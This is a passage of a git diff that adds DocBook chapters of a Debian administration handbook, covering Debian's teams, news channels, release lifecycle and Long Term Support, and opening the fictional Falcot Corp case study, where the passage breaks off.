+          the group responsible for quality assurance within Debian (known as
+          Debian QA).</para>
+          <indexterm><primary>assurance</primary><secondary>quality assurance</secondary></indexterm>
+          <indexterm><primary>quality</primary><secondary>assurance</secondary></indexterm>
+        </sidebar>
+
+	<para>The <emphasis>listmasters</emphasis> administer the e-mail
+	server that manages the mailing lists. They create new lists,
+	handle bounces (delivery failure notices), and maintain spam
+	filters (unsolicited bulk e-mail).</para>
+        <indexterm><primary>listmaster</primary></indexterm>
+
+        <sidebar>
+          <title><emphasis>CULTURE</emphasis> Traffic on the mailing lists: some figures</title>
+          <indexterm><primary>lists</primary><secondary>mailing lists</secondary></indexterm>
+	  <indexterm><primary>mailing lists</primary></indexterm>
+
+          
+	  <para>The mailing lists are, without a doubt, the best testimony to
+	  activity on a project, since they keep track of everything that
+	  happens. Some statistics (from 2017) regarding our mailing lists
+	  speak for themselves: Debian hosts more than 250 lists, totaling
+	  217,000 individual subscriptions. The 27,000 messages sent each
+	  month generate 476,000 e-mails daily.</para>
+        </sidebar>
+
+	<para>Each specific service has its own administration team,
+	generally composed of volunteers who have installed it (and also
+	frequently programmed the corresponding tools themselves). This is
+	the case of the bug tracking system (BTS), the package tracker,
+	<literal>salsa.debian.org</literal> (GitLab
+	server, see sidebar <xref linkend="sidebar.gitlab" />), the services available on
+	<literal>qa.debian.org</literal>,
+	<literal>lintian.debian.org</literal>,
+	<literal>buildd.debian.org</literal>,
+	<literal>cdimage.debian.org</literal>, etc.</para>
+      </section>
+      <section>
+        <title>Development Teams, Transversal Teams</title>
+
+	<para>Unlike administrative teams, the development teams are rather
+	widely open, even to outside contributors. Even if Debian does not
+	have a vocation to create software, the project needs some specific
+	programs to meet its goals. Of course, developed under a free
+	software license, these tools make use of methods proven elsewhere
+	in the free software world.</para>
+
+        <sidebar id="sidebar.git">
+          <title><emphasis>CULTURE</emphasis> Git</title>
+          <indexterm><primary>Git</primary></indexterm>
+          <indexterm><primary>configuration management</primary></indexterm>
+
+	  <para>Git is a tool for
+	  collaborative work on multiple files, while maintaining a history
+	  of modifications. The files in question are generally text files,
+	  such as a program's source code. If several people work together
+	  on the same file, <command>git</command> can only merge the
+	  alterations made if they were made to different portions of the
+	  file. Otherwise, these “conflicts” must be resolved by hand.
+	  </para>
+
+          <para>Git is a distributed system where each user has a repository
+          with the complete history of changes. Central repositories are
+          used to download the project (<command>git clone</command>)
+          and to share the work done with others (<command>git push</command>).
+          The repository can contain multiple versions of the files
+          but only one version can be worked on at a given time: it's
+          called the working copy (it can be changed to point to another
+          version with <command>git checkout</command>).
+          Git can show you the modifications made to the working copy
+          (<command>git diff</command>), can store them in the repository
+          by creating a new entry in the versions history
+          (<command>git commit</command>), can update the working copy
+          to include modifications made in parallel by other users
+          (<command>git pull</command>), and can record a particular
+          configuration in the history in order to be able to easily
+          extract it later on (<command>git tag</command>).
+          </para>
+
+	  <para>Git makes it easy to handle
+	  multiple concurrent versions of a project in development without
+	  them interfering with each other. These versions are called
+	  <emphasis>branches</emphasis>. This metaphor of a tree is fairly
+	  accurate, since a program is initially developed on a common
+	  trunk. When a milestone has been reached (such as version 1.0),
+	  development continues on two branches: the development branch
+	  prepares the next major release, and the maintenance branch
+	  manages updates and fixes for version 1.0.</para>
+
+          <indexterm><primary>Version Control System (VCS)</primary></indexterm>
+          <para>Git is, nowadays, the most popular version control system but
+          it is not the only one. Historically, CVS (Concurrent Versions System)
+          was the first widely used tool but its numerous limitations
+          contributed to the appearance of more modern free alternatives.
+          These include, especially, <command>subversion</command>
+	  (<command>svn</command>), <command>git</command>,
+	  <command>bazaar</command> (<command>bzr</command>), and
+          <command>mercurial</command> (<command>hg</command>).
+          <ulink type="block" url="http://www.nongnu.org/cvs/" />
+          <ulink type="block" url="http://subversion.apache.org/" />
+          <ulink type="block" url="http://git-scm.com/" />
+          <ulink type="block" url="http://bazaar.canonical.com/" />
+          <ulink type="block" url="http://mercurial.selenic.com/" /></para>
+          <indexterm><primary><command>subversion</command></primary></indexterm>
+          <indexterm><primary><command>svn</command></primary></indexterm>
+          <indexterm><primary><command>git</command></primary></indexterm>
+          <indexterm><primary><command>bzr</command></primary></indexterm>
+          <indexterm><primary><command>hg</command></primary></indexterm>
+          <indexterm><primary><command>mercurial</command></primary></indexterm>
+          <indexterm><primary><command>cvs</command></primary></indexterm>
+        </sidebar>
+
+	<para>Debian has developed little software of its own, but certain
+	programs have assumed a starring role, and their fame has spread
+	beyond the scope of the project. Good examples are
+	<command>dpkg</command>, the Debian package management program (it
+	is, in fact, an abbreviation of Debian PacKaGe, and generally
+	pronounced as “dee-package”), and
+	<command>apt</command>, a tool to automatically install any Debian
+	package, and its dependencies, guaranteeing the consistency of the
+	system after an upgrade (its name is an acronym for Advanced Package
+	Tool). Their teams are, however, much smaller, since a rather high
+	level of programming skill is required to gain an overall understanding of
+	the operations of these types of programs.</para>
+
+	<para>The most important team is probably that for the Debian
+	installation program, <command>debian-installer</command>, which
+	has accomplished a work of momentous proportions since its
+	conception in 2001. Numerous contributors were needed, since it is
+	difficult to write a single program able to install Debian on a
+	dozen different architectures. Each one has its own mechanism for
+	booting and its own bootloader. All of this work is coordinated on
+	the <email>debian-boot@lists.debian.org</email> mailing list, under
+        the direction of Cyril Brulebois.
+        <ulink type="block" url="http://www.debian.org/devel/debian-installer/" />
+        <ulink type="block" url="http://joeyh.name/blog/entry/d-i_retrospective/" /></para>
+
+	<para>The (very small) <command>debian-cd</command> program team
+	has an even more modest objective. Many “small” contributors
+	are responsible for their architecture, since the main developer
+	can not know all the subtleties, nor the exact way to start the
+	installer from the CD-ROM.</para>
+
+	<para>Many teams must collaborate with others in the activity of
+	packaging: <email>debian-qa@lists.debian.org</email> tries, for
+	example, to ensure quality at all levels of the Debian project. The
+	<email>debian-policy@lists.debian.org</email> list develops Debian
+	Policy according to proposals from all over the place. The teams in
+	charge of each architecture
+	(<email>debian-<replaceable>architecture</replaceable>@lists.debian.org</email>)
+	compile all packages, adapting them to their particular
+	architecture, if needed.</para>
+
+	<para>Other teams manage the most important packages in order to
+	ensure maintenance without placing too heavy a load on a single
+	pair of shoulders; this is the case with the C library and
+	<email>debian-glibc@lists.debian.org</email>, the C compiler on the
+	<email>debian-gcc@lists.debian.org</email> list, or Xorg on the
+	<email>debian-x@lists.debian.org</email> (this group is also known
+	as the X Strike Force).</para>
+      </section>
+    </section>
+  </section>
+
+  <section id="sect.follow-debian-news">
+    <title>Follow Debian News</title>
+
+    <para>As already mentioned, the Debian project evolves in a very
+    distributed, very organic way.  As a consequence, it may be
+    difficult at times to stay in touch with what happens within the
+    project without being overwhelmed with a never-ending flood of
+    notifications.</para>
+
+    <para>If you only want the most important news about Debian, you
+    probably should subscribe to the
+    <email>debian-announce@lists.debian.org</email> list.  This is a
+    very low-traffic list (around a dozen messages a year), and only
+    gives the most important announcements, such as the availability
+    of a new stable release, the election of a new Project Leader, or
+    the yearly Debian Conference.
+    <ulink type="block" url="https://lists.debian.org/debian-announce/" />
+    </para>
+
+    <indexterm><primary>Debian Project News</primary></indexterm>
+    <para>More general (and regular) news about Debian are sent to the
+    <email>debian-news@lists.debian.org</email> list.  The traffic on
+    this list is quite reasonable too (usually around a handful of
+    messages a month), and it includes the semi-regular “Debian
+    Project News”, which is a compilation of various small bits of
+    information about what happens in the project.
+    <ulink type="block" url="https://lists.debian.org/debian-news/" />
+    </para>
+
+    <sidebar>
+      <title><emphasis>COMMUNITY</emphasis> The publicity team</title>
+      <para>Debian's official communication channels are managed by volunteers
+      of the Debian publicity team. They are delegates of the Debian Project
+      Leader and moderate news and announcements posted there.
+      Many other volunteers contribute to the team, for example by
+      writing articles for “Debian Project News” or by animating
+      the microblogging service
+      (<ulink url="https://micronews.debian.org/">micronews.debian.org</ulink>).
+      <ulink type="block" url="https://wiki.debian.org/Teams/Publicity" />
+      </para>
+    </sidebar>
+
+    <para>For more information about the evolution of Debian and
+    what is happening at some point in time in various teams,
+    there's also the
+    <email>debian-devel-announce@lists.debian.org</email> list.  As
+    its name implies, the announcements it carries will probably be
+    more interesting to developers, but it also allows interested
+    parties to keep an eye on what happens in more concrete terms
+    than just when a stable version is released.  While
+    <email>debian-announce@lists.debian.org</email> gives news about the user-visible
+    results, <email>debian-devel-announce@lists.debian.org</email> gives news about
+    how these results are produced.  As a side note, “d-d-a” (as it
+    is sometimes referred to) is the only list that
+    Debian developers must be subscribed to.
+    <ulink type="block" url="https://lists.debian.org/debian-devel-announce/" />
+    </para>
+
+    <para>
+      Debian's official blog (<ulink url="https://bits.debian.org">bits.debian.org</ulink>) is also a
+      good source of information. It conveys most of the interesting news
+      that are published on the various mailing lists that we already
+      covered and other important news contributed by community members.
+      Since all Debian developers can contribute these news when they think they have
+      something noteworthy to make public, Debian's blog gives a valuable
+      insight while staying rather focused on the project as a whole.
+    </para>
+
+    <indexterm><primary>Planet Debian</primary></indexterm>
+    <para>A more informal source of information can also be found on
+    Planet Debian, which aggregates articles posted by Debian
+    contributors on their respective blogs.  While the contents do not
+    deal exclusively with Debian development, they provide a view into
+    what is happening in the community and what its members are up to.
+    <ulink type="block" url="https://planet.debian.org/" />
+    </para>
+
+    <indexterm><primary>microblog</primary></indexterm>
+    <indexterm><primary>Identi.ca</primary></indexterm>
+    <indexterm><primary>Twitter</primary></indexterm>
+    <indexterm><primary>Facebook</primary></indexterm>
+    <indexterm><primary>Google+</primary></indexterm>
+    <indexterm><primary>social networks</primary></indexterm>
+    <indexterm><primary>network</primary><secondary>social networks</secondary></indexterm>
+    <para>The project is also well represented on social networks.
+    While Debian only has an official presence on platforms
+    built with free software (like the Identi.ca microblogging
+    platform, powered by <emphasis>pump.io</emphasis>),
+    there are many Debian contributors who are
+    animating Twitter accounts, Facebook pages, Google+ pages,
+    and more.
+    <ulink type="block" url="https://identi.ca/debian" />
+    <ulink type="block" url="https://twitter.com/debian" />
+    <ulink type="block" url="https://www.facebook.com/debian" />
+    <ulink type="block" url="https://plus.google.com/111711190057359692089" />
+    </para>
+  </section>
+
+  <section id="sect.role-of-distributions">
+    <title>The Role of Distributions</title>
+    <indexterm><primary>Linux distribution</primary><secondary>role</secondary></indexterm>
+
+    <para>A GNU/Linux distribution has two main objectives: install a free
+    operating system on a computer (either with or without an existing
+    system or systems), and provide a range of software covering all of the
+    users' needs.</para>
+    <section>
+      <title>The Installer: <command>debian-installer</command></title>
+
+      <para>The <command>debian-installer</command>, designed to be
+      extremely modular in order to be as generic as possible, targets the
+      first objective. It covers a broad range of installation situations and in
+      general, greatly facilitates the creation of a derivative installer
+      corresponding to a particular case.</para>
+
+      <para>This modularity, which also makes it very complex, may be
+      daunting for the developers discovering this tool; but whether
+      used in graphical or text mode, the user's experience is still
+      similar. Great efforts have been made to reduce the number of
+      questions asked at installation time, in particular thanks to
+      the inclusion of automatic hardware detection software.</para>
+
+      <para>It is interesting to note that distributions derived from
+      Debian differ greatly on this aspect, and provide a more limited
+      installer (often confined to the i386 or amd64 architectures), but more
+      user-friendly for the uninitiated. On the other hand, they usually
+      refrain from straying too far from package contents in order to
+      benefit as much as possible from the vast range of software offered
+      without causing compatibility problems.</para>
+    </section>
+    <section>
+      <title>The Software Library</title>
+
+      
+      <para>Quantitatively, Debian is undeniably the leader in this
+      respect, with over 25,000 source packages. Qualitatively,
+      Debian’s policy and long testing period prior to releasing a new
+      stable version justify its reputation for stability and
+      consistency. As far as availability, everything is available
+      on-line through many mirrors worldwide, with updates pushed out
+      every six hours.</para>
+
+      <para>Many retailers sell DVD-ROMs on the Internet at a very low price
+      (often at cost), the “images” for which are freely available for
+      download. There is only one drawback: the low frequency of releases
+      of new stable versions (their development sometimes takes more than
+      two years), which delays the inclusion of new software.</para>
+
+      <para>Most new free software programs quickly find their way into the
+      development version which allows them to be installed. If this
+      requires too many updates due to their dependencies, the program can
+      also be recompiled for the stable version of Debian (see <xref linkend="debian-packaging" /> for more information on this
+      topic).</para>
+    </section>
+  </section>
+  <section id="sect.release-lifecycle">
+    <title>Lifecycle of a Release</title>
+    <indexterm><primary>lifecycle</primary></indexterm>
+    <indexterm><primary><emphasis role="distribution">Unstable</emphasis></primary></indexterm>
+    <indexterm><primary><emphasis role="distribution">Testing</emphasis></primary></indexterm>
+    <indexterm><primary><emphasis role="distribution">Stable</emphasis></primary></indexterm>
+    <indexterm><primary><emphasis role="distribution">Experimental</emphasis></primary></indexterm>
+    <indexterm><primary><emphasis role="distribution">Oldstable</emphasis></primary></indexterm>
+    <indexterm><primary><emphasis role="distribution">Oldoldstable</emphasis></primary></indexterm>
+
+    <para>The project will simultaneously have three to six different
+    versions of each program, named <emphasis role="distribution">Experimental</emphasis>, <emphasis role="distribution">Unstable</emphasis>, <emphasis role="distribution">Testing</emphasis>, <emphasis role="distribution">Stable</emphasis>, <emphasis role="distribution">Oldstable</emphasis>, and even <emphasis role="distribution">Oldoldstable</emphasis>. Each one corresponds to a
+    different phase in development. For a good understanding, let us take a
+    look at a program's journey, from its initial packaging to inclusion in
+    a stable version of Debian.</para>
+
+    <sidebar>
+      <title><emphasis>VOCABULARY</emphasis> Release</title>
+      <indexterm><primary>release</primary></indexterm>
+
+      <para>The term “release”, in the Debian project, indicates a
+      particular version of a distribution (e.g., “unstable release”
+      means “the unstable version”). It also indicates the public
+      announcement of the launch of any new version (stable).</para>
+    </sidebar>
+    <section>
+      <title>The <emphasis role="distribution">Experimental</emphasis> Status</title>
+
+      <para>First let us take a look at the particular case of the
+      <emphasis role="distribution">Experimental</emphasis> distribution:
+      this is a group of Debian packages corresponding to the software
+      currently in development, and not necessarily completed, explaining
+      its name. Not everything passes through this step; some developers
+      add packages here in order to get feedback from more experienced (or
+      braver) users.</para>
+
+      <para>Otherwise, this distribution frequently houses important
+      modifications to base packages, whose integration into <emphasis role="distribution">Unstable</emphasis> with serious bugs would
+      have critical repercussions. It is, thus, a completely isolated
+      distribution, its packages never migrate to another version
+      (except by direct, express intervention of the maintainer or the
+      ftpmasters).  It is also not self-contained: only a subset of
+      the existing packages are present in <emphasis role="distribution">Experimental</emphasis>, and it generally
+      does not include the base system.  This distribution is
+      therefore mostly useful in combination with another,
+      self-contained, distribution such as <emphasis role="distribution">Unstable</emphasis>.</para>
+    </section>
+    <section>
+      <title>The <emphasis role="distribution">Unstable</emphasis> Status</title>
+
+      <para>Let us turn back to the case of a typical package. The
+      maintainer creates an initial package, which they compile for
+      the <emphasis role="distribution">Unstable</emphasis> version
+      and place on the <literal>ftp-master.debian.org</literal>
+      server. This first event involves inspection and validation from
+      the ftpmasters. The software is then available in the <emphasis role="distribution">Unstable</emphasis> distribution, which is
+      the “cutting edge” distribution chosen by users who are more
+      concerned with having up to date packages than worried about
+      serious bugs. They discover the program and then test it.</para>
+
+      <para>If they encounter bugs, they report them to the package's
+      maintainer. The maintainer then regularly prepares corrected
+      versions, which they upload to the server.</para>
+
+      <para>Every newly updated package is updated on all Debian mirrors
+      around the world within six hours. The users then test the
+      corrections and search for other problems resulting from the
+      modifications. Several updates may then occur rapidly. During these
+      times, autobuilder robots come into action. Most frequently, the
+      maintainer has only one traditional PC and has compiled their package
+      on the amd64 (or i386) architecture (or they opted for a source-only
+      upload, thus without any precompiled package); the autobuilders take over and
+      automatically compile versions for all the other architectures. Some
+      compilations may fail; the maintainer will then receive a bug report
+      indicating the problem, which is then to be corrected in the next
+      versions. When the bug is discovered by a specialist for the
+      architecture in question, the bug report may come with a patch ready
+      to use.</para>
+      <indexterm><primary>autobuilder</primary></indexterm>
+
+      <figure>
+        <title>Compilation of a package by the autobuilders</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/autobuilder.png" scalefit="1" width="75%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <sidebar>
+        <title><emphasis>QUICK LOOK</emphasis> <command>buildd</command>, the Debian package recompiler</title>
+        <indexterm><primary><command>buildd</command></primary></indexterm>
+        <indexterm><primary>build daemon</primary></indexterm>
+
+	<para><emphasis>buildd</emphasis> is the abbreviation of “build
+	daemon”. This program automatically recompiles new versions of
+	Debian packages on the architectures on which it is hosted
+	(cross-compilation is avoided as much as possible).</para>
+
+	<para>Thus, to produce binaries for the <literal>arm64</literal>
+	architecture, the project has <literal>arm64</literal> machines
+	available. The <emphasis>buildd</emphasis> program
+	runs on them continuously and creates
+	binary packages for <literal>arm64</literal> from source packages
+	sent by Debian developers.</para>
+
+	<para>This software is used on all the computers serving as
+	autobuilders for Debian. By extension, the term
+	<emphasis>buildd</emphasis> frequently is used to refer to these
+	machines, which are generally reserved solely for this
+	purpose.</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Migration to <emphasis role="distribution">Testing</emphasis></title>
+
+      <para>A bit later, the package will have matured; compiled on all the
+      architectures, it will not have undergone recent modifications. It is
+      then a candidate for inclusion in the <emphasis role="distribution">Testing</emphasis> distribution — a group of
+      <emphasis role="distribution">Unstable</emphasis> packages chosen
+      according to some quantifiable criteria. Every day a program
+      automatically selects the packages to include in <emphasis role="distribution">Testing</emphasis>, according to elements
+      guaranteeing a certain level of quality:</para>
+      <orderedlist>
+        <listitem>
+	  <para>lack of critical bugs, or, at least fewer than the version
+	  currently included in <emphasis role="distribution">Testing</emphasis>;</para>
+        </listitem>
+        <listitem>
+	  <para>at least 10 days spent in <emphasis role="distribution">Unstable</emphasis>, which is sufficient time
+	  to find and report any serious problems;</para>
+        </listitem>
+        <listitem>
+	  <para>successful compilation on all officially supported
+	  architectures;</para>
+        </listitem>
+        <listitem>
+	  <para>dependencies that can be satisfied in <emphasis role="distribution">Testing</emphasis>, or that can at least be
+	  moved there together with the package in question.</para>
+        </listitem>
+      </orderedlist>
+
+      <para>This system is clearly not infallible; critical bugs are
+      regularly found in packages included in <emphasis role="distribution">Testing</emphasis>. Still, it is generally
+      effective, and <emphasis role="distribution">Testing</emphasis> poses
+      far fewer problems than <emphasis role="distribution">Unstable</emphasis>, being for many, a good
+      compromise between stability and novelty.</para>
+
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> Limitations of <emphasis role="distribution">Testing</emphasis></title>
+
+	<para>While very interesting in principle, <emphasis role="distribution">Testing</emphasis> does have some practical
+	problems: the tangle of cross-dependencies between packages is such
+	that a package can rarely move there completely on its own. With
+	packages all depending upon each other, it is sometimes necessary to migrate a
+	large number of packages simultaneously, which is impossible when some are
+	uploading updates regularly. On the other hand, the script
+	identifying the families of related packages works hard to create
+	them (this would be an NP-complete problem, for which, fortunately,
+	we know some good heuristics). This is why we can manually interact
+	with and guide this script by suggesting groups of packages, or
+	imposing the inclusion of certain packages in a group, even if this
+	temporarily breaks some dependencies. This functionality is
+	accessible to the Release Managers and their assistants.</para>
+
+	<para>Recall that an NP-complete problem is of an exponential
+	algorithmic complexity according to the size of the data, here
+	being the length of the code (the number of figures) and the
+	elements involved. The only way to resolve it is frequently to
+	examine all possible configurations, which could require enormous
+	means. A heuristic is an approximate, but satisfying,
+	solution.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>COMMUNITY</emphasis> The Release Manager</title>
+        <indexterm><primary>Release Manager</primary></indexterm>
+        <indexterm><primary>Stable Release Manager</primary></indexterm>
+
+	<para>Release Manager is an important title, associated with heavy
+	responsibilities. The bearer of this title must, in effect, manage
+	the release of a new, stable version of Debian, and define the
+	process for development of <emphasis role="distribution">Testing</emphasis> until it meets the quality
+	criteria for <emphasis role="distribution">Stable</emphasis>. They
+	also define a tentative schedule (not always followed).</para>
+
+	<para>We also have Stable Release Managers, often abbreviated SRM,
+	who manage and select updates for the current stable version of
+	Debian. They systematically include security patches and examine
+	all other proposals for inclusion, on a case by case basis, sent by
+	Debian developers eager to update their package in the stable
+	version.</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>The Promotion from <emphasis role="distribution">Testing</emphasis> to <emphasis role="distribution">Stable</emphasis></title>
+
+      <para>Let us suppose that our package is now included in <emphasis role="distribution">Testing</emphasis>. As long as it has room for
+      improvement, its maintainer must continue to improve it and
+      restart the process from <emphasis role="distribution">Unstable</emphasis> (but its later inclusion in
+      <emphasis role="distribution">Testing</emphasis> is generally faster:
+      unless it changed significantly, all of its dependencies are
+      already available). When it reaches perfection, the maintainer has
+      completed their work. The next step is the inclusion in the <emphasis role="distribution">Stable</emphasis> distribution, which is, in
+      reality, a simple copy of <emphasis role="distribution">Testing</emphasis> at a moment chosen by the
+      Release Manager. Ideally this decision is made when the installer is
+      ready, and when no program in <emphasis role="distribution">Testing</emphasis> has any known critical
+      bugs.</para>
+
+      <para>Since this moment never truly arrives, in practice, Debian must
+      compromise: remove packages whose maintainer has failed to correct
+      bugs on time, or agree to release a distribution with some bugs in
+      the thousands of programs. The Release Manager will have previously
+      announced a freeze period, during which each update to <emphasis role="distribution">Testing</emphasis> must be approved. The goal
+      here is to prevent any new version (and its new bugs), and to only
+      approve updates fixing bugs.</para>
+
+      <figure>
+        <title>A package's path through the various Debian versions</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/release-cycle.png" width="60%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <sidebar>
+        <title><emphasis>VOCABULARY</emphasis> Freeze: the home straight</title>
+        <indexterm><primary>freeze</primary></indexterm>
+
+	<para>During the freeze period, development of the <emphasis role="distribution">Testing</emphasis> distribution is blocked; no
+	more automatic updates are allowed. Only the Release Managers are
+	then authorized to change packages, according to their own
+	criteria. The purpose is to prevent the appearance of new bugs by
+	introducing new versions; only thoroughly examined updates are
+	authorized when they correct significant bugs.</para>
+      </sidebar>
+
+      <para>After the release of a new stable version, the Stable Release
+      Managers manage all further development (called “revisions”, ex:
+      7.1, 7.2, 7.3 for version 7). These updates systematically
+      include all security patches. They will also include the most
+      important corrections (the maintainer of a package must prove the
+      gravity of the problem that they wish to correct in order to have
+      their updates included).</para>
+
+      <para>At the end of the journey, our hypothetical package is now included in
+      the stable distribution. This journey, not without its difficulties,
+      explains the significant delays separating the Debian Stable
+      releases. This contributes, over all, to its reputation for quality.
+      Furthermore, the majority of users are satisfied using one of the
+      three distributions simultaneously available. The system
+      administrators, concerned above all about the stability of their
+      servers, don't need the latest and greatest version of GNOME; they can choose Debian
+      <emphasis role="distribution">Stable</emphasis>, and they will be
+      satisfied. End users, more interested in the latest versions of GNOME
+      or KDE Plasma than in rock-solid stability, will find Debian <emphasis role="distribution">Testing</emphasis> to be a good compromise
+      between a lack of serious problems and relatively up to date
+      software. Finally, developers and more experienced users may blaze
+      the trail, testing all the latest developments in Debian <emphasis role="distribution">Unstable</emphasis> right out of the gate, at the
+      risk of suffering the headaches and bugs inherent in any new version
+      of a program. To each their own Debian!</para>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> GNOME and KDE Plasma, graphical desktop environments</title>
+
+	<para>GNOME (GNU Network Object Model Environment) and Plasma by KDE
+	are the two most popular graphical desktop
+	environments in the free software world. A desktop environment is a
+	set of programs grouped together to allow easy management of the
+	most common operations through a graphical interface. They
+	generally include a file manager, office suite, web browser, e-mail
+	program, multimedia accessories, etc. The most visible difference
+	resides in the choice of the graphical library used: GNOME has
+	chosen GTK+ (free software licensed under the LGPL), and the KDE community
+	has selected Qt (a company-backed project, available nowadays both
+	under the GPL and a commercial license).
+	<ulink type="block" url="https://www.gnome.org/" />
+	<ulink type="block" url="https://www.kde.org/" /></para>
+      </sidebar>
+
+      <figure>
+        <title>Chronological path of a program packaged by Debian</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/package-lifecycle.png" scalefit="1" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+    </section>
+    <section>
+      <title>The <emphasis role="distribution">Oldstable</emphasis> and <emphasis role="distribution">Oldoldstable</emphasis> Status</title>
+      <indexterm><primary>Long Term Support (LTS)</primary></indexterm>
+      <indexterm><primary>support</primary><secondary>Long Term Support (LTS)</secondary></indexterm>
+      <para>Each <emphasis role="distribution">Stable</emphasis> release
+      has an expected lifetime of about 5 years and given that releases tend
+      to happen every 2 years, there can be up to 3 supported releases
+      at a given point of time. When a new stable release happens, the former
+      release becomes <emphasis role="distribution">Oldstable</emphasis>
+      and the one even before becomes <emphasis role="distribution">Oldoldstable</emphasis>.
+      </para>
+      <para>This Long Term Support (LTS) of Debian releases is a recent
+      initiative: individual contributors and companies joined forces to create
+      the Debian LTS team. Older releases which are no longer supported by
+      the Debian security team fall under the responsibility of this new team.
+      </para>
+      <para>
+      The Debian security team handles security support in the current
+      <emphasis role="distribution">Stable</emphasis>
+      release and also in the <emphasis role="distribution">Oldstable</emphasis> release (but only for as long
+      as is needed to ensure one year of overlap with the current stable release).
+      This amounts roughly to three years of support for each release. The
+      Debian LTS team handles the last (two) years of security support so that
+      each releases benefits from at least 5 years of support and so that
+      users can upgrade from version N to N+2.
+      <ulink type="block" url="https://wiki.debian.org/LTS" />
+      </para>
+      <sidebar>
+        <title><emphasis>COMMUNITY</emphasis> Companies sponsoring the LTS effort</title>
+        <para>Long Term Support is a difficult commitment to make in Debian because
+        volunteers tend to avoid the work that is not very fun. And providing security
+        support for 5 years old software is — for many contributors — a
+        lot less fun than packaging new upstream versions or developing new features.
+        </para>
+        <para>To bring this project to life, the project counted on the fact that
+        long term support was particularly relevant for companies and that they would
+        be willing to mutualize the cost of this security support.
+        </para>
+        <para>The project started in June 2014: some organizations
+        allowed their employees to contribute part-time to Debian LTS
+        while others preferred to sponsor the project with money so that
+        Debian contributors get paid to do the work that they would not do
+        for free. Most Debian contributors willing to be paid to work on
+        LTS got together to create a clear sponsorship offer managed by
+        Freexian (Raphaël Hertzog's company):
+        <ulink type="block" url="https://www.freexian.com/services/debian-lts.html" />
+        </para>
+        <para>In the Debian LTS team, the volunteers work on packages they care about
+        while the paid contributors prioritize packages used by their
+        sponsors.
+        </para>
+        <para>The project is always looking for new sponsors:
+        What about your company? Can you let an employee work part-time on
+        long term support? Can you allocate a small budget for security
+        support?
+        <ulink type="block" url="https://wiki.debian.org/LTS/Funding" />
+        </para>
+      </sidebar>
+    </section>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/02_case-study.xml b/tmp/cs-CZ/xml_tmp/02_case-study.xml
new file mode 100644
index 000000000..f79095dff
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/02_case-study.xml
@@ -0,0 +1,342 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="case-study">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-case-study.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>Falcot Corp</keyword>
+      <keyword>SMB</keyword>
+      <keyword>Strong Growth</keyword>
+      <keyword>Master Plan</keyword>
+      <keyword>Migration</keyword>
+      <keyword>Cost Reduction</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Presenting the Case Study</title>
+  <highlights>
+    <para>In the context of this book, you are the system
+    administrator of a growing small business. The time has come for
+    you to redefine the information systems master plan for the coming
+    year in collaboration with your directors.  You choose to
+    progressively migrate to Debian, both for practical and economical
+    reasons. Let's see in more detail what's in store for you…</para>
+  </highlights>
+
+  <para>We have envisioned this case study to approach all modern
+  information system services currently used in a medium sized company.
+  After reading this book, you will have all of the elements necessary to
+  install Debian on your servers and fly on your own wings. You will also
+  learn how to efficiently find information in the event of
+  difficulties.</para>
+
+  <section id="sect.fast-growing-it-needs">
+    <title>Fast Growing IT Needs</title>
+
+    <para>Falcot Corp is a manufacturer of high quality audio
+    equipment.  The company is growing strongly, and has two
+    facilities, one in Saint-Étienne, and another in Montpellier. The
+    former has around 150 employees; it hosts a factory for the
+    manufacturing of speakers, a design lab, and all administrative
+    office. The Montpellier site is smaller, with only about 50
+    workers, and produces amplifiers.</para>
+
+    <sidebar>
+      <title><emphasis>NOTE</emphasis> Fictional company created for case study</title>
+
+      <para>The Falcot Corp company used as an example here is
+      completely fictional. Any resemblance to an existing company is
+      purely coincidental. Likewise, some example data throughout
+      this book may be fictional.</para>
+    </sidebar>
+
+    <para>The information system has had difficulty keeping up with the
+    company's growth, so they are now determined to completely redefine it
+    to meet various goals established by management:</para>
+    <itemizedlist>
+      <listitem>
+	<para>modern, easily scalable infrastructure;</para>
+      </listitem>
+      <listitem>
+	<para>reducing cost of software licenses thanks to use of Open
+	Source software;</para>
+      </listitem>
+      <listitem>
+	<para>installation of an e-commerce website, possibly B2B (business
+	to business, i.e. linking of information systems between different
+	companies, such as a supplier and its clients);</para>
+      </listitem>
+      <listitem>
+	<para>significant improvement in security to better protect
+	trade secrets related to new products.</para>
+      </listitem>
+    </itemizedlist>
+
+    <para>The entire information system will be overhauled with these
+    goals in mind.</para>
+  </section>
+  <section id="sect.master-plan">
+    <title>Master Plan</title>
+    <indexterm><primary>master plan</primary></indexterm>
+    <indexterm><primary>migration</primary></indexterm>
+
+    <para>With your collaboration, IT management has conducted a slightly
+    more extensive study, identifying some constraints and defining a plan
+    for migration to the chosen Open Source system, Debian.</para>
+
+    <para>A significant constraint identified is that the accounting
+    department uses specific software, which only runs on
+    <trademark>Microsoft Windows</trademark>. The laboratory, for its part,
+    uses computer aided design software that runs on
+    <trademark>OS X</trademark>.</para>
+
+    <figure>
+      <title>Overview of the Falcot Corp network</title>
+      <mediaobject>
+        <imageobject>
+          <imagedata fileref="images/case-study.png" scalefit="1" width="75%" />
+        </imageobject>
+      </mediaobject>
+    </figure>
+
+    <para>The switch to Debian will be gradual; a small business, with
+    limited means, cannot reasonably change everything overnight. For
+    starters, the IT staff must be trained in Debian
+    administration. The servers will then be converted, starting with
+    the network infrastructure (routers, firewalls, etc.) followed by
